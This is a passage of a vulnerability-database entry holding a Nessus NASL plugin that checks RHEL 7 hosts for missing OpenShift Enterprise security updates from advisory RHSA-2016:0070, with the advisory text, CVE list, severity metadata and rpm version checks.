Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2016-0070.NASL", "href": "https://www.tenable.com/plugins/nessus/119442", "published": "2018-12-06T00:00:00", "title": "RHEL 7 : openshift (RHSA-2016:0070)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0070. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119442);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2013-2186\", \"CVE-2014-1869\", \"CVE-2014-3661\", \"CVE-2014-3662\", \"CVE-2014-3663\", \"CVE-2014-3664\", \"CVE-2014-3666\", \"CVE-2014-3667\", \"CVE-2014-3680\", \"CVE-2014-3681\", \"CVE-2015-1806\", \"CVE-2015-1807\", \"CVE-2015-1808\", \"CVE-2015-1810\", \"CVE-2015-1812\", \"CVE-2015-1813\", \"CVE-2015-1814\", \"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\", \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\", \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\", \"CVE-2015-8103\", \"CVE-2016-1905\", \"CVE-2016-1906\");\n script_xref(name:\"RHSA\", value:\"2016:0070\");\n script_xref(name:\"TRA\", value:\"TRA-2016-23\");\n\n script_name(english:\"RHEL 7 : openshift (RHSA-2016:0070)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat OpenShift Enterprise release 3.1.1 is now available 
with\nupdates to packages that fix several security issues, bugs and\nintroduce feature enhancements.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issues are addressed with this release :\n\nAn authorization flaw was discovered in Kubernetes; the API server did\nnot properly check user permissions when handling certain requests. An\nauthenticated remote attacker could use this flaw to gain additional\naccess to resources such as RAM and disk space. (CVE-2016-1905)\n\nAn authorization flaw was discovered in Kubernetes; the API server did\nnot properly check user permissions when handling certain build-\nconfiguration strategies. A remote attacker could create build\nconfigurations with strategies that violate policy. 
Although the\nattacker could not launch the build themselves (launch fails when the\npolicy is violated), if the build configuration files were later\nlaunched by other privileged services (such as automated triggers),\nuser privileges could be bypassed allowing attacker escalation.\n(CVE-2016-1906)\n\nAn update for Jenkins Continuous Integration Server that addresses a\nlarge number of security issues including XSS, CSRF, information\ndisclosure and code execution have been addressed as well.\n(CVE-2013-2186, CVE-2014-1869, CVE-2014-3661, CVE-2014-3662\nCVE-2014-3663, CVE-2014-3664, CVE-2014-3666, CVE-2014-3667\nCVE-2014-3680, CVE-2014-3681, CVE-2015-1806, CVE-2015-1807\nCVE-2015-1808, CVE-2015-1810, CVE-2015-1812, CVE-2015-1813\nCVE-2015-1814, CVE-2015-5317, CVE-2015-5318, CVE-2015-5319\nCVE-2015-5320, CVE-2015-5321, CVE-2015-5322, CVE-2015-5323\nCVE-2015-5324, CVE-2015-5325, CVE-2015-5326 ,CVE-2015-7537\nCVE-2015-7538, CVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes and enhancements in\nthis advisory. 
See the OpenShift Enterprise 3.1 Release Notes, which\nwill be updated shortly for release 3.1.1, for details about these\nchanges :\n\nhttps://docs.openshift.com/enterprise/3.1/release_notes/\nose_3_1_release_notes.html\n\nAll OpenShift Enterprise 3 users are advised to upgrade to these\nupdated packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0070\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1807\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1808\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1810\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5326\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2015-7539\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8103\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2016-23\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-dockerregistry\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-pod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-recycle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-sdn-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:atomic-openshift-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:heapster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-align-text\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ansi-green\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ansi-wrap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-anymatch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-arr-diff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-arr-flatten\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-array-unique\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-arrify\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-async-each\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-binary-extensions\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-braces\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-capture-stack-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-chokidar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-configstore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-create-error-class\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-deep-extend\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-duplexer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-duplexify\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-end-of-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-error-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-es6-promise\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-event-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-expand-brackets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-expand-range\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-extglob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-filename-regex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-fill-range\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-for-in\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-for-own\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-from\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-glob-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-glob-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-got\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-graceful-fs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-binary-path\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-dotfile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-equal-shallow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-extendable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-extglob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-glob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-npm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-number\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-plain-obj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-primitive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-redirect\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-is-stream\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-isobject\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-kind-of\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-latest-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lazy-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.assign\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.baseassign\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.basecopy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.bindcallback\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.createassigner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.defaults\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.getnative\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.isarguments\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.isarray\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.isiterateecall\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.keys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lodash.restparam\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-lowercase-keys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-map-stream\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-micromatch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-mkdirp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-node-status-codes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-nodemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-normalize-path\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-object-assign\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-object.omit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-optimist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-os-homedir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-os-tmpdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-osenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-package-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-parse-glob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-parse-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-pause-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-pinkie\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-pinkie-promise\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-prepend-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-preserve\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-ps-tree\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-randomatic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-rc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-read-all-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-readdirp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-regex-cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-registry-url\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-repeat-element\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-semver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-semver-diff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-slide\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-split\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-stream-combiner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-string-length\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-strip-json-comments\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-success-symbol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-through\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-timed-out\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-touch\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-undefsafe\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-unzip-response\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-update-notifier\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-url-parse-lax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-uuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-write-file-atomic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nodejs-xdg-basedir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss_wrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nss_wrapper-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-filter-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-lookup-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-playbooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-roles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:openvswitch-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:origin-kibana\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tuned-profiles-atomic-openshift-node\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0070\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_exists(rpm:\"atomic-openshift-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-clients-redistributable-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-clients-redistributable-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-dockerregistry-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-dockerregistry-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-master-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-master-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-node-3.1\", release:\"RHEL7\") 
